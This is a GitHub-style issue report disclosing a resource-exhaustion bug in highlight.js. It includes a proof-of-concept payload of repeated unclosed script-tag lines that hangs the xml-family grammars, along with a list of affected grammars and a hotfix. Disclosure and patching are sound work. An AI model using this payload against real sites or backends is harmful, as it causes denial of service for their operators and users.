highlight.js
highlight.js copied to clipboard
highlightjs
Resource exhaustion
Describe the issue/behavior that seems buggy While testing our code, we found that we could make our 'markdown editor' crash. After some additional research, I found that the highlighting caused it.
I also decided to test the POC on the demo page of highlight.js, and there it also uses a lot of resources. The browser will eventually show the 'This page isn't responding' pop-up
Sample Code or Instructions to Reproduce
<body>
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
<script>self.__next_f.push([1,":[\"
</body>
Expected behavior Page doesn't crash
Additional context I submitted this to [email protected], but didn't get any response. This can be used to impact the availability of a webpage.
If people use this package in their back-ends (NodeJS, pdf generators, ...) This will cause load on their infrastructure, eventually resulting in a denial of service
The original payload won't trigger it for all grammars. I'll send an email to [email protected] with the list of vulnerable grammars and a minimal reproduction PoC that includes another payload that will trigger the vulnerability for a longer list.
Since it's been months now with no reply from the maintainers, here or via email, publicly disclosing so that others can patch if needed.
Affected grammars:
- django
- dust
- xml
- hbs
- mojolicious
- parser3
- qml
- twig
- xquery
The vulnerability can be hotfixed by removing the 'xml' sublanguage from <script> tags in src/languages/xml.js (line 183).
FYI @poeck